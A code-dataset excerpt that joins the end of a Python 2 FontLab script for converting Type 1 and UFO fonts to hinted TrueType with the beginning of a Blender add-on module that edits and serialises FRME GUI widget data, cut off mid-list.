fl.font.other_blues_num = len(newOtherBluesArray)
for x in range(len(newOtherBluesArray)):
fl.font.other_blues[0][x] = newOtherBluesArray[x]
baselineZonesWereRemoved = True
newFamilyOtherBluesArray = processZonesArray(fl.font.family_other_blues[0])
if (fl.font.family_other_blues_num != len(newFamilyOtherBluesArray)):
# trim the number of zones
fl.font.family_other_blues_num = len(newFamilyOtherBluesArray)
for x in range(len(newFamilyOtherBluesArray)):
fl.font.family_other_blues[0][x] = newFamilyOtherBluesArray[x]
baselineZonesWereRemoved = True
return baselineZonesWereRemoved
def replaceFontZonesByFamilyZones():
"""
The font's zones are replaced by the family zones to make sure that all
the styles have the same vertical height at all ppems. If the font doesn't
have family zones (e.g. Regular style), don't do anything.
"""
fontZonesWereReplaced = False
# TOP zones
if len(fl.font.family_blues[0]):
if fl.font.family_blues_num == 14 and fl.font.blue_values_num < fl.font.family_blues_num:
print
print "### MAJOR ERROR ###: Due to a FontLab bug the font's TOP zones cannot be replaced by the family TOP zones"
print
return fontZonesWereReplaced
elif fl.font.family_blues_num == 14 and fl.font.blue_values_num == fl.font.family_blues_num:
pass
else:
fl.font.blue_values_num = fl.font.family_blues_num
# This will create a traceback if there are 7 top zones,
# therefore the IFs above.
# Replace the font's zones by the family zones
for x in range(len(fl.font.family_blues[0])):
fl.font.blue_values[0][x] = fl.font.family_blues[0][x]
print "WARNING: The font's TOP zones were replaced by the family TOP zones."
fontZonesWereReplaced = True
# BOTTOM zones
if len(fl.font.family_other_blues[0]):
if fl.font.family_other_blues_num == 10 and fl.font.other_blues_num < fl.font.family_other_blues_num:
print
print "### MAJOR ERROR ###: Due to a FontLab bug the font's BOTTOM zones cannot be replaced by the family BOTTOM zones"
print
return fontZonesWereReplaced
elif fl.font.family_other_blues_num == 10 and fl.font.other_blues_num == fl.font.family_other_blues_num:
pass
else:
fl.font.other_blues_num = fl.font.family_other_blues_num
# This will create a traceback if there are 5 bottom zones,
# therefore the IFs above.
# Replace the font's zones by the family zones
for x in range(len(fl.font.family_other_blues[0])):
fl.font.other_blues[0][x] = fl.font.family_other_blues[0][x]
print "WARNING: The font's BOTTOM zones were replaced by the family BOTTOM zones."
fontZonesWereReplaced = True
return fontZonesWereReplaced
def convertT1toTT():
'''
Converts an open FL font object from PS to TT outlines, using on-board
FontLab commands. The outlines are post-processed to reset starting points
to their original position.
'''
for g in fl.font.glyphs:
# Keeping track of original start point coordinates:
startPointCoords = [
(point.x, point.y) for point in g.nodes if point.type == 17]
# fl.TransformGlyph(g, 5, "0001") # Remove Horizontal Hints
# fl.TransformGlyph(g, 5, "0003") # Remove Horizontal & Vertical Hints
fl.TransformGlyph(g, 5, "0002") # Remove Vertical Hints
fl.TransformGlyph(g, 13, "") # Curves to TrueType
fl.TransformGlyph(g, 14, "0001") # Contour direction [TT]
# The start points might move when FL reverses the contour.
# This dictionary keeps track of the new coordinates.
newCoordDict = {
(node.x, node.y): index for index, node in enumerate(g.nodes)}
# Going through all start points backwards, and re-setting them
# to original position.
for pointCoords in startPointCoords[::-1]:
g.SetStartNode(newCoordDict[pointCoords])
fl.TransformGlyph(g, 7, "") # Convert PS hints to TT instructions.
def changeTTfontSettings():
# Clear `gasp` array:
if len(fl.font.ttinfo.gasp):
del fl.font.ttinfo.gasp[0]
# Create `gasp` element:
gaspElement = TTGasp(65535, 2)
# Range: 65535=0...
# Options: 0=None
# 1=Instructions
# 2=Smoothing
# 3=Instructions+Smoothing
# Add element to `gasp` array
fl.font.ttinfo.gasp[0] = gaspElement
# Clear `hdmx` array
for i in range(len(fl.font.ttinfo.hdmx)):
try:
del fl.font.ttinfo.hdmx[0]
except:
continue
# Uncheck "Create [vdmx] table", also
# uncheck "Automatically add .null, CR and space characters"
fl.font.ttinfo.head_flags = 0
def setType1openPrefs():
flPrefs.T1Decompose = 1 # checked - Decompose all composite glyphs
flPrefs.T1Unicode = 0 # unchecked - Generate Unicode indexes for all glyphs
flPrefs.OTGenerate = 0 # unchecked - Generate basic OpenType features for Type 1 fonts with Standard encoding
flPrefs.T1MatchEncoding = 0 # unchecked - Find matching encoding table if possible
def setTTgeneratePrefs():
flPrefs.TTENoReorder = 1 # unchecked - Automatically reorder glyphs
flPrefs.TTEFontNames = 1 # option - Do not export OpenType name records
flPrefs.TTESmartMacNames = 0 # unchecked - Use the OpenType names as menu names on Macintosh
flPrefs.TTEStoreTables = 0 # unchecked - Write stored custom TrueType/OpenType tables
flPrefs.TTEExportOT = 0 # unchecked - Export OpenType layout tables
flPrefs.DSIG_Use = 0 # unchecked - Generate digital signature (DSIG table)
flPrefs.TTEHint = 1 # checked - Export hinted TrueType fonts
flPrefs.TTEKeep = 1 # checked - Write stored TrueType native hinting
flPrefs.TTEVisual = 1 # checked - Export visual TrueType hints
flPrefs.TTEAutohint = 0 # unchecked - Autohint unhinted glyphs
flPrefs.TTEWriteBitmaps = 0 # unchecked - Export embedded bitmaps
flPrefs.CopyHDMXData = 0 # unchecked - Copy HDMX data from base to composite glyph
flPrefs.OTWriteMort = 0 # unchecked - Export "mort" table if possible
flPrefs.TTEVersionOS2 = 3 # option - OS/2 table version 3
flPrefs.TTEWriteKernTable = 0 # unchecked - Export old-style non-OpenType "kern" table
flPrefs.TTEWriteKernFeature = 0 # unchecked - Generate OpenType "kern" feature if it is undefined or outdated
flPrefs.TTECmap10 = 1 # option - Use following codepage to build cmap(1,0) table:
# [Current codepage in the Font Window]
flPrefs.TTEExportUnicode = 0 # checked - Ignore Unicode indexes in the font
# option - Use following codepage for first 256 glyphs:
# Do not reencode first 256 glyphs
# unchecked - Export only first 256 glyphs of the selected codepage
# unchecked - Put MS Char Set value into fsSelection field
def setTTautohintPrefs():
# The single link attachment precision is 7 in all cases
# flPrefs.TTHHintingOptions = 16135 # All options checked
# flPrefs.TTHHintingOptions = 7 # All options unchecked
flPrefs.TTHHintingOptions = 2055 # Cusps option checked
def postProccessTTF(fontFilePath):
'''
Post-process TTF font as generated by FontLab:
- change FontLab-generated glyph name 'nonmarkingspace' to 'nbspace'
- edit `prep` table to stop hints being active at 96 ppm and above.
'''
print "Post-processing font.ttf file..."
font = ttLib.TTFont(fontFilePath)
glyphOrder = font.getGlyphOrder()
postTable = font['post']
if 'prep' in font.keys():
prepTable = font['prep']
else:
prepTable = None
glyfTable = font['glyf']
hmtxTable = font['hmtx']
# Change name of 'nonbreakingspace' to 'nbspace' in GlyphOrder
# and glyf table and add it to post table
if "nonbreakingspace" in glyphOrder:
# updateGlyphOrder = True
glyphOrder[glyphOrder.index("nonbreakingspace")] = "nbspace"
font.setGlyphOrder(glyphOrder)
glyfTable.glyphs["nbspace"] = glyfTable.glyphs["nonbreakingspace"]
del glyfTable.glyphs["nonbreakingspace"]
hmtxTable.metrics["nbspace"] = hmtxTable.metrics["nonbreakingspace"]
del hmtxTable.metrics["nonbreakingspace"]
postTable.extraNames.append("nbspace")
# Delete NULL and CR
for gName in ["NULL", "nonmarkingreturn"]:
if gName in glyphOrder:
del glyphOrder[glyphOrder.index(gName)]
font.setGlyphOrder(glyphOrder)
del glyfTable.glyphs[gName]
del hmtxTable.metrics[gName]
if gName in postTable.extraNames:
del postTable.extraNames[postTable.extraNames.index(gName)]
# Extend the prep table
# If the last byte is
# WCVTP[ ] /* WriteCVTInPixels */
# add these extra bytes
# MPPEM[ ] /* MeasurePixelPerEm */
# PUSHW[ ] /* 1 value pushed */
# 96
# GT[ ] /* GreaterThan */
# IF[ ] /* If */
# PUSHB[ ] /* 1 value pushed */
# 1
# ELSE[ ] /* Else */
# PUSHB[ ] /* 1 value pushed */
# 0
# EIF[ ] /* EndIf */
# PUSHB[ ] /* 1 value pushed */
# 1
# INSTCTRL[ ] /* SetInstrExecControl */
if prepTable:
if prepTable.program.bytecode[-1] == 68:
prepTable.program.bytecode.extend(
[75, 184, 0, 96, 82, 88, 176, 1, 27, 176, 0, 89, 176, 1, 142])
# Save the changes
folderPath, fontFileName = os.path.split(fontFilePath)
newFontFilePath = os.path.join(folderPath, "%s%s" % ('_', fontFileName))
font.save(newFontFilePath)
font.close()
os.remove(fontFilePath)
os.rename(newFontFilePath, fontFilePath)
def convertTXTfontToPFA(txtPath):
tempPFApath = txtPath.replace('.txt', '_TEMP_.pfa')
command = 'type1 "%s" > "%s"' % (txtPath, tempPFApath)
# Run type1 tool
if MAC:
pp = os.popen(command)
# report = pp.read()
pp.close()
if PC:
pp = Popen(command, shell=True, stdout=PIPE, stderr=PIPE)
out, err = pp.communicate()
if err:
print out, err
return tempPFApath
def convertUFOfontToPFA(ufoPath):
tempPFApath = ufoPath.replace('.ufo', '_TEMP_.pfa')
command = 'tx -t1 "%s" > "%s"' % (ufoPath, tempPFApath)
# Run tx tool
if MAC:
pp = os.popen(command)
# report = pp.read()
pp.close()
if PC:
pp = Popen(command, shell=True, stdout=PIPE, stderr=PIPE)
out, err = pp.communicate()
if err:
print out, err
return tempPFApath
def processFonts(fontsList):
totalFonts = len(fontsList)
print "%d fonts found:\n%s\n" % (totalFonts, '\n'.join(fontsList))
setType1openPrefs()
setTTgeneratePrefs()
setTTautohintPrefs()
fontIndex = 1
for pfaPath in fontsList:
# Make temporary encoding file from GOADB file. This step needs to
# be done per font, because the directory tree selected may contain
# more than one family, or because the glyph set of a given family
# may not be the same for both Roman/Upright and Italic/Sloped.
encPath = None
goadbPath = None
# The GOADB can be located in the same folder or up to two
# levels above in the directory tree
sameLevel = os.path.join(os.path.dirname(pfaPath), kGOADBfileName)
oneUp = os.path.join(
os.path.dirname(os.path.dirname(pfaPath)), kGOADBfileName)
twoUp = os.path.join(
os.path.dirname(os.path.dirname(os.path.dirname(pfaPath))), kGOADBfileName)
if os.path.exists(sameLevel):
goadbPath = sameLevel
elif os.path.exists(oneUp):
goadbPath = oneUp
elif os.path.exists(twoUp):
goadbPath = twoUp
if goadbPath:
encPath = makeTempEncFileFromGOADB(goadbPath)
else:
print "Could not find %s file." % kGOADBfileName
print "Skipping %s" % pfaPath
print
if not encPath:
continue
# Checking if a derivedchars file exists.
# If not, the dvInput step is skipped.
makeDV = False
for file in os.listdir(os.path.split(pfaPath)[0]):
if re.search(r'derivedchars(.+?)?$', file) and dvModuleFound:
makeDV = True
fontIsTXT = False
fontIsUFO = False
if kFontTXT in pfaPath:
fontIsTXT = True
pfaPath = convertTXTfontToPFA(pfaPath)
elif kFontUFO in pfaPath or (pfaPath[-4:].lower() in [".ufo"]):
# Support more than just files named "font.ufo"
fontIsUFO = True
pfaPath = convertUFOfontToPFA(pfaPath)
fl.Open(pfaPath)
print "\nProcessing %s ... (%d/%d)" % (
fl.font.font_name, fontIndex, totalFonts)
fontIndex += 1
fontZonesWereReplaced = replaceFontZonesByFamilyZones()
baselineZonesWereRemoved = removeBottomZonesAboveBaseline()
# NOTE: After making changes to the PostScript alignment zones, the TT
# equivalents have to be updated as well, but I couldn't find a way
# to do it via scripting (because TTH.top_zones and TTH.bottom_zones
# are read-only, and despite that functionality being available in
# the UI, there's no native function to update TT zones from T1 zones).
# So the solution is to generate a new T1 font and open it back.
pfaPathTemp = pfaPath.replace('.pfa', '_TEMP_.pfa')
infPathTemp = pfaPathTemp.replace('.pfa', '.inf')
if baselineZonesWereRemoved or fontZonesWereReplaced:
fl.GenerateFont(eval("ftTYPE1ASCII"), pfaPathTemp)
fl[fl.ifont].modified = 0
fl.Close(fl.ifont)
fl.Open(pfaPathTemp)
if os.path.exists(infPathTemp):
# Delete the .INF file (bug in FL v5.1.x)
os.remove(infPathTemp)
# Load encoding file
fl.font.encoding.Load(encPath)
# Make sure the Font window is in 'Names mode'
fl.CallCommand(fl_cmd.FontModeNames)
# Sort glyphs by encoding
fl.CallCommand(fl_cmd.FontSortByCodepage)
# read derivedchars file, make components
if makeDV:
dvInput_module.run(verbose=False)
convertT1toTT()
changeTTfontSettings()
# Switch the Font window to 'Index mode'
fl.CallCommand(fl_cmd.FontModeIndex)
# path to the folder containing the font, and the font's file name
folderPath, fontFileName = os.path.split(pfaPath)
ppmsFilePath = os.path.join(folderPath, kPPMsFileName)
if os.path.exists(ppmsFilePath):
hPPMs, vPPMs = readPPMsFile(ppmsFilePath)
replaceStemsAndPPMs(hPPMs, vPPMs)
tthintsFilePath = os.path.join(folderPath, kTTHintsFileName)
if os.path.exists(tthintsFilePath):
inputTTHints.run(folderPath)
# readTTHintsFile(tthintsFilePath)
# replaceTTHints()
# FontLab 5.1.5 Mac Build 5714 does NOT respect the unchecked
# option "Automatically add .null, CR and space characters"
for gName in ["NULL", "CR"]:
gIndex = fl.font.FindGlyph(gName)
if gIndex != -1:
del fl.font.glyphs[gIndex]
vfbPath = pfaPath.replace('.pfa', '.vfb')
fl.Save(vfbPath)
# The filename of the TT output is hardcoded
ttfPath = os.path.join(folderPath, kFontTTF)
fl.GenerateFont(eval("ftTRUETYPE"), ttfPath)
fl[fl.ifont].modified = 0
fl.Close(fl.ifont)
# The TT font generated with FontLab ends up with a few glyph names
# changed. Fix the glyph names so that makeOTF does not fail.
postProccessTTF(ttfPath)
# Delete temporary Encoding file:
if os.path.exists(encPath):
os.remove(encPath)
# Delete temp PFA:
if os.path.exists(pfaPathTemp):
os.remove(pfaPathTemp)
# Cleanup after processing from TXT type1 font or UFO font
if fontIsTXT or fontIsUFO:
if os.path.exists(pfaPath):
os.remove(pfaPath)
if os.path.exists(ttfPath):
finalTTFpath = ttfPath.replace('_TEMP_.ttf', '.ttf')
if finalTTFpath != ttfPath:
if PC:
os.remove(finalTTFpath)
os.rename(ttfPath, finalTTFpath)
if os.path.exists(vfbPath):
finalVFBpath = vfbPath.replace('_TEMP_.vfb', '.vfb')
if finalVFBpath != vfbPath:
if PC and os.path.exists(finalVFBpath):
os.remove(finalVFBpath)
os.rename(vfbPath, finalVFBpath)
# remove FontLab leftovers
pfmPath = pfaPathTemp.replace('.pfa', '.pfm')
afmPath = pfaPathTemp.replace('.pfa', '.afm')
if os.path.exists(pfmPath):
os.remove(pfmPath)
if os.path.exists(afmPath):
os.remove(afmPath)
def run():
# Get folder to process
baseFolderPath = fl.GetPathName("Select font family directory")
if not baseFolderPath: # Cancel was clicked or ESC key was pressed
return
startTime = time.time()
fontsList = getFontPaths(baseFolderPath)
if len(fontsList):
processFonts(fontsList)
else:
print "No fonts found"
endTime = time.time()
elapsedSeconds = endTime-startTime
if (elapsedSeconds/60) < 1:
print '\nCompleted in %.1f seconds.\n' % elapsedSeconds
else:
print '\nCompleted in %d minutes and %d seconds.\n' % (
elapsedSeconds/60, elapsedSeconds%60)
if __name__ == "__main__":
if not errorHappened:
run()
|
mit
| -4,984,340,435,244,985,000
| 34.212637
| 131
| 0.621636
| false
| 3.592859
| false
| false
| false
|
RetroView/hecl
|
blender/hecl/frme.py
|
3
|
21197
|
import bpy, struct, math
from mathutils import Quaternion
def draw(layout, context):
if bpy.context.active_object:
obj = bpy.context.active_object
layout.label(text="Widget Settings:", icon='OBJECT_DATA')
layout.prop_menu_enum(obj, 'retro_widget_type', text='Widget Type')
#layout.prop_search(obj, 'retro_widget_parent', context.scene, 'objects', text='Widget Parent')
row = layout.row(align=True)
row.prop(obj, 'retro_widget_default_visible', text='Visible')
row.prop(obj, 'retro_widget_default_active', text='Active')
row.prop(obj, 'retro_widget_cull_faces', text='Cull Faces')
layout.prop(obj, 'retro_widget_color', text='Color')
layout.prop_menu_enum(obj, 'retro_widget_model_draw_flags', text='Draw Flags')
row = layout.row(align=True)
row.prop(obj, 'retro_widget_is_worker', text='Is Worker')
if obj.retro_widget_is_worker:
row.prop(obj, 'retro_widget_worker_id', text='Worker Id')
if obj.retro_widget_type == 'RETRO_MODL':
layout.prop(obj, 'retro_model_light_mask', text='Light Mask')
elif obj.retro_widget_type == 'RETRO_PANE':
layout.prop(obj, 'retro_pane_dimensions', text='Dimensions')
layout.prop(obj, 'retro_pane_scale_center', text='Center')
elif obj.retro_widget_type == 'RETRO_TXPN':
layout.prop(obj, 'retro_pane_dimensions', text='Dimensions')
layout.prop(obj, 'retro_pane_scale_center', text='Center')
layout.prop(obj, 'retro_textpane_font_path', text='Font Path')
row = layout.row(align=True)
row.prop(obj, 'retro_textpane_word_wrap', text='Word Wrap')
row.prop(obj, 'retro_textpane_horizontal', text='Horizontal')
layout.prop(obj, 'retro_textpane_fill_color', text='Fill Color')
layout.prop(obj, 'retro_textpane_outline_color', text='Outline Color')
layout.prop(obj, 'retro_textpane_block_extent', text='Point Dimensions')
layout.prop(obj, 'retro_textpane_jp_font_path', text='JP Font Path')
layout.prop(obj, 'retro_textpane_jp_font_scale', text='JP Point Dimensions')
layout.prop_menu_enum(obj, 'retro_textpane_hjustification', text='Horizontal Justification')
layout.prop_menu_enum(obj, 'retro_textpane_vjustification', text='Vertical Justification')
elif obj.retro_widget_type == 'RETRO_TBGP':
layout.prop(obj, 'retro_tablegroup_elem_count', text='Element Count')
layout.prop(obj, 'retro_tablegroup_elem_default', text='Default Element')
layout.prop(obj, 'retro_tablegroup_wraparound', text='Wraparound')
elif obj.retro_widget_type == 'RETRO_GRUP':
layout.prop(obj, 'retro_group_default_worker', text='Default Worker')
elif obj.retro_widget_type == 'RETRO_SLGP':
row = layout.row(align=True)
row.prop(obj, 'retro_slider_min', text='Min')
row.prop(obj, 'retro_slider_max', text='Max')
layout.prop(obj, 'retro_slider_default', text='Default')
layout.prop(obj, 'retro_slider_increment', text='Increment')
elif obj.retro_widget_type == 'RETRO_ENRG':
layout.prop(obj, 'retro_energybar_texture_path', text='Energy Bar Texture Path')
elif obj.retro_widget_type == 'RETRO_METR':
layout.prop(obj, 'retro_meter_no_round_up', text='No Round Up')
layout.prop(obj, 'retro_meter_max_capacity', text='Max Capacity')
layout.prop(obj, 'retro_meter_worker_count', text='Worker Count')
elif obj.retro_widget_type == 'RETRO_LITE':
if obj.data and obj.type == 'LIGHT':
layout.prop(obj.data, 'retro_light_index', text='Index')
layout.label(text="Angular Falloff:", icon='LIGHT')
row = layout.row(align=True)
row.prop(obj.data, 'retro_light_angle_constant', text='Constant')
row.prop(obj.data, 'retro_light_angle_linear', text='Linear')
row.prop(obj.data, 'retro_light_angle_quadratic', text='Quadratic')
hjustifications = None
vjustifications = None
model_draw_flags_e = None
def recursive_cook(buffer, obj, version, path_hasher, parent_name):
buffer += struct.pack('>4s', obj.retro_widget_type[6:].encode())
buffer += obj.name.encode() + b'\0'
buffer += parent_name.encode() + b'\0'
buffer += struct.pack('>bbbbffffI',
False,
obj.retro_widget_default_visible,
obj.retro_widget_default_active,
obj.retro_widget_cull_faces,
obj.retro_widget_color[0],
obj.retro_widget_color[1],
obj.retro_widget_color[2],
obj.retro_widget_color[3],
model_draw_flags_e[obj.retro_widget_model_draw_flags])
angle = Quaternion((1.0, 0.0, 0.0), 0)
if obj.retro_widget_type == 'RETRO_CAMR':
angle = Quaternion((1.0, 0.0, 0.0), math.radians(-90.0))
aspect = bpy.context.scene.render.resolution_x / bpy.context.scene.render.resolution_y
if obj.data.type == 'PERSP':
if aspect > 1.0:
fov = math.degrees(math.atan(math.tan(obj.data.angle / 2.0) / aspect)) * 2.0
else:
fov = math.degrees(obj.data.angle)
buffer += struct.pack('>Iffff', 0, fov, aspect, obj.data.clip_start, obj.data.clip_end)
elif obj.data.type == 'ORTHO':
ortho_half = obj.data.ortho_scale / 2.0
buffer += struct.pack('>Iffffff', 1, -ortho_half, ortho_half, ortho_half / aspect,
-ortho_half / aspect, obj.data.clip_start, obj.data.clip_end)
elif obj.retro_widget_type == 'RETRO_MODL':
if len(obj.children) == 0:
raise RuntimeException('Model Widget must have a child model object')
model_obj = obj.children[0]
if model_obj.type != 'MESH':
raise RuntimeException('Model Widget must have a child MESH')
if not model_obj.data.library:
raise RuntimeException('Model Widget must have a linked library MESH')
path = bpy.path.abspath(model_obj.data.library.filepath)
path_hash = path_hasher.hashpath32(path)
buffer += struct.pack('>III', path_hash, 0, obj.retro_model_light_mask)
elif obj.retro_widget_type == 'RETRO_PANE':
buffer += struct.pack('>fffff',
obj.retro_pane_dimensions[0],
obj.retro_pane_dimensions[1],
obj.retro_pane_scale_center[0],
obj.retro_pane_scale_center[1],
obj.retro_pane_scale_center[2])
elif obj.retro_widget_type == 'RETRO_TXPN':
path_hash = path_hasher.hashpath32(obj.retro_textpane_font_path)
buffer += struct.pack('>fffffIbbIIffffffffff',
obj.retro_pane_dimensions[0],
obj.retro_pane_dimensions[1],
obj.retro_pane_scale_center[0],
obj.retro_pane_scale_center[1],
obj.retro_pane_scale_center[2],
path_hash,
obj.retro_textpane_word_wrap,
obj.retro_textpane_horizontal,
hjustifications[obj.retro_textpane_hjustification],
vjustifications[obj.retro_textpane_vjustification],
obj.retro_textpane_fill_color[0],
obj.retro_textpane_fill_color[1],
obj.retro_textpane_fill_color[2],
obj.retro_textpane_fill_color[3],
obj.retro_textpane_outline_color[0],
obj.retro_textpane_outline_color[1],
obj.retro_textpane_outline_color[2],
obj.retro_textpane_outline_color[3],
obj.retro_textpane_block_extent[0],
obj.retro_textpane_block_extent[1])
if version >= 1:
path_hash = path_hasher.hashpath32(obj.retro_textpane_jp_font_path)
buffer += struct.pack('>III',
path_hash,
obj.retro_textpane_jp_font_scale[0],
obj.retro_textpane_jp_font_scale[1])
elif obj.retro_widget_type == 'RETRO_TBGP':
buffer += struct.pack('>HHIHHbbffbfHHHH',
obj.retro_tablegroup_elem_count,
0,
0,
obj.retro_tablegroup_elem_default,
0,
obj.retro_tablegroup_wraparound,
False,
0.0,
0.0,
False,
0.0,
0,
0,
0,
0)
elif obj.retro_widget_type == 'RETRO_GRUP':
buffer += struct.pack('>Hb',
obj.retro_group_default_worker,
False)
elif obj.retro_widget_type == 'RETRO_SLGP':
buffer += struct.pack('>ffff',
obj.retro_slider_min,
obj.retro_slider_max,
obj.retro_slider_default,
obj.retro_slider_increment)
elif obj.retro_widget_type == 'RETRO_ENRG':
path_hash = path_hasher.hashpath32(obj.retro_energybar_texture_path)
buffer += struct.pack('>I', path_hash)
elif obj.retro_widget_type == 'RETRO_METR':
buffer += struct.pack('>bbII',
False,
obj.retro_meter_no_round_up,
obj.retro_meter_max_capacity,
obj.retro_meter_worker_count)
elif obj.retro_widget_type == 'RETRO_LITE':
angle = Quaternion((1.0, 0.0, 0.0), math.radians(-90.0))
type_enum = 0
constant = 1.0
linear = 0.0
quadratic = 0.0
cutoff = 0.0
if obj.data.type == 'POINT':
type_enum = 4
elif obj.data.type == 'SUN':
type_enum = 2
elif obj.data.type == 'SPOT':
type_enum = 0
cutoff = obj.data.spot_size
if obj.data.type == 'POINT' or obj.data.type == 'SPOT':
constant = obj.data.constant_coefficient
linear = obj.data.linear_coefficient
quadratic = obj.data.quadratic_coefficient
buffer += struct.pack('>IffffffI',
type_enum, constant, linear, quadratic,
obj.data.retro_light_angle_constant,
obj.data.retro_light_angle_linear,
obj.data.retro_light_angle_quadratic,
obj.data.retro_light_index)
if obj.data.type == 'SPOT':
buffer += struct.pack('>f', cutoff)
elif obj.retro_widget_type == 'RETRO_IMGP':
if obj.type != 'MESH':
raise RuntimeException('Imagepane Widget must be a MESH')
if len(obj.data.loops) < 4:
raise RuntimeException('Imagepane Widget must be a MESH with 4 verts')
if len(obj.data.uv_layers) < 1:
raise RuntimeException('Imagepane Widget must ba a MESH with a UV layer')
path_hash = 0xffffffff
if len(obj.data.materials):
material = obj.data.materials[0]
if 'Image Texture' in material.node_tree.nodes:
image_node = material.node_tree.nodes['Image Texture']
if image_node.image:
image = image_node.image
path = bpy.path.abspath(image.filepath)
path_hash = path_hasher.hashpath32(path)
buffer += struct.pack('>IIII', path_hash, 0, 0, 4)
for i in range(4):
vi = obj.data.loops[i].vertex_index
co = obj.data.vertices[vi].co
buffer += struct.pack('>fff', co[0], co[1], co[2])
buffer += struct.pack('>I', 4)
for i in range(4):
co = obj.data.uv_layers[0].data[i].uv
buffer += struct.pack('>ff', co[0], co[1])
if obj.retro_widget_is_worker:
buffer += struct.pack('>bH', True, obj.retro_widget_worker_id)
else:
buffer += struct.pack('>b', False)
angMtx = angle.to_matrix() @ obj.matrix_local.to_3x3()
buffer += struct.pack('>fffffffffffffffIH',
obj.matrix_local[0][3],
obj.matrix_local[1][3],
obj.matrix_local[2][3],
angMtx[0][0], angMtx[0][1], angMtx[0][2],
angMtx[1][0], angMtx[1][1], angMtx[1][2],
angMtx[2][0], angMtx[2][1], angMtx[2][2],
0.0, 0.0, 0.0, 0, 0)
ch_list = []
for ch in obj.children:
ch_list.append((ch.pass_index, ch.name))
for s_pair in sorted(ch_list):
ch = bpy.data.objects[s_pair[1]]
if ch.retro_widget_type != 'RETRO_NONE':
recursive_cook(buffer, ch, version, path_hasher, obj.name)
def cook(writepipebuf, version, path_hasher):
global hjustifications, vjustifications, model_draw_flags_e
hjustifications = dict((i[0], i[3]) for i in bpy.types.Object.retro_textpane_hjustification[1]['items'])
vjustifications = dict((i[0], i[3]) for i in bpy.types.Object.retro_textpane_vjustification[1]['items'])
model_draw_flags_e = dict((i[0], i[3]) for i in bpy.types.Object.retro_widget_model_draw_flags[1]['items'])
buffer = bytearray()
buffer += struct.pack('>IIII', 0, 0, 0, 0)
widget_count = 0
for obj in bpy.data.objects:
if obj.retro_widget_type != 'RETRO_NONE':
widget_count += 1
buffer += struct.pack('>I', widget_count)
for obj in bpy.data.objects:
if obj.retro_widget_type != 'RETRO_NONE' and not obj.parent:
recursive_cook(buffer, obj, version, path_hasher, 'kGSYS_DummyWidgetID')
return buffer
# Registration
def register():
frame_widget_types = [
('RETRO_NONE', 'Not a Widget', '', 0),
('RETRO_BWIG', 'Base Widget', '', 1),
('RETRO_CAMR', 'Camera', '', 2),
('RETRO_ENRG', 'Energy Bar', '', 3),
('RETRO_GRUP', 'Group', '', 4),
('RETRO_HWIG', 'Head Widget', '', 5),
('RETRO_IMGP', 'Image Pane', '', 6),
('RETRO_LITE', 'Light', '', 7),
('RETRO_MODL', 'Model', '', 8),
('RETRO_METR', 'Meter', '', 9),
('RETRO_PANE', 'Pane', '', 10),
('RETRO_SLGP', 'Slider Group', '', 11),
('RETRO_TBGP', 'Table Group', '', 12),
('RETRO_TXPN', 'Text Pane', '', 13)]
bpy.types.Object.retro_widget_type = bpy.props.EnumProperty(items=frame_widget_types, name='Retro: FRME Widget Type', default='RETRO_NONE')
model_draw_flags = [
('RETRO_SHADELESS', 'Shadeless', '', 0),
('RETRO_OPAQUE', 'Opaque', '', 1),
('RETRO_ALPHA', 'Alpha', '', 2),
('RETRO_ADDITIVE', 'Additive', '', 3),
('RETRO_ALPHA_ADDITIVE_OVERDRAW', 'Alpha Additive Overdraw', '', 4)]
bpy.types.Object.retro_widget_parent = bpy.props.StringProperty(name='Retro: FRME Widget Parent', description='Refers to internal frame widgets')
bpy.types.Object.retro_widget_use_anim_controller = bpy.props.BoolProperty(name='Retro: Use Animiation Conroller')
bpy.types.Object.retro_widget_default_visible = bpy.props.BoolProperty(name='Retro: Default Visible', description='Sets widget is visible by default')
bpy.types.Object.retro_widget_default_active = bpy.props.BoolProperty(name='Retro: Default Active', description='Sets widget is cases by default')
bpy.types.Object.retro_widget_cull_faces = bpy.props.BoolProperty(name='Retro: Cull Faces', description='Enables face culling')
bpy.types.Object.retro_widget_color = bpy.props.FloatVectorProperty(name='Retro: Color', description='Sets widget color', subtype='COLOR', size=4, min=0.0, max=1.0)
bpy.types.Object.retro_widget_model_draw_flags = bpy.props.EnumProperty(items=model_draw_flags, name='Retro: Model Draw Flags', default='RETRO_ALPHA')
bpy.types.Object.retro_widget_is_worker = bpy.props.BoolProperty(name='Retro: Is Worker Widget', default=False)
bpy.types.Object.retro_widget_worker_id = bpy.props.IntProperty(name='Retro: Worker Widget ID', min=0, default=0)
bpy.types.Object.retro_model_light_mask = bpy.props.IntProperty(name='Retro: Model Light Mask', min=0, default=0)
bpy.types.Object.retro_pane_dimensions = bpy.props.FloatVectorProperty(name='Retro: Pane Dimensions', min=0.0, size=2)
bpy.types.Object.retro_pane_scale_center = bpy.props.FloatVectorProperty(name='Retro: Scale Center', size=3)
bpy.types.Object.retro_textpane_font_path = bpy.props.StringProperty(name='Retro: Font Path')
bpy.types.Object.retro_textpane_word_wrap = bpy.props.BoolProperty(name='Retro: Word Wrap')
bpy.types.Object.retro_textpane_horizontal = bpy.props.BoolProperty(name='Retro: Horizontal', default=True)
bpy.types.Object.retro_textpane_fill_color = bpy.props.FloatVectorProperty(name='Retro: Fill Color', min=0.0, max=1.0, size=4, subtype='COLOR')
bpy.types.Object.retro_textpane_outline_color = bpy.props.FloatVectorProperty(name='Retro: Outline Color', min=0.0, max=1.0, size=4, subtype='COLOR')
bpy.types.Object.retro_textpane_block_extent = bpy.props.FloatVectorProperty(name='Retro: Block Extent', min=0.0, size=2)
bpy.types.Object.retro_textpane_jp_font_path = bpy.props.StringProperty(name='Retro: Japanese Font Path')
bpy.types.Object.retro_textpane_jp_font_scale = bpy.props.IntVectorProperty(name='Retro: Japanese Font Scale', min=0, size=2)
frame_textpane_hjustifications = [
('LEFT', 'Left', '', 0),
('CENTER', 'Center', '', 1),
('RIGHT', 'Right', '', 2),
('FULL', 'Full', '', 3),
('NLEFT', 'Left Normalized', '', 4),
('NCENTER', 'Center Normalized', '', 5),
('NRIGHT', 'Right Normalized', '', 6),
('LEFTMONO', 'Left Monospaced', '', 7),
('CENTERMONO', 'Center Monospaced', '', 8),
('RIGHTMONO', 'Right Monospaced', '', 9)]
bpy.types.Object.retro_textpane_hjustification = bpy.props.EnumProperty(items=frame_textpane_hjustifications, name='Retro: Horizontal Justification', default='LEFT')
frame_textpane_vjustifications = [
('TOP', 'Top', '', 0),
('CENTER', 'Center', '', 1),
('BOTTOM', 'Bottom', '', 2),
('FULL', 'Full', '', 3),
('NTOP', 'Top Normalized', '', 4),
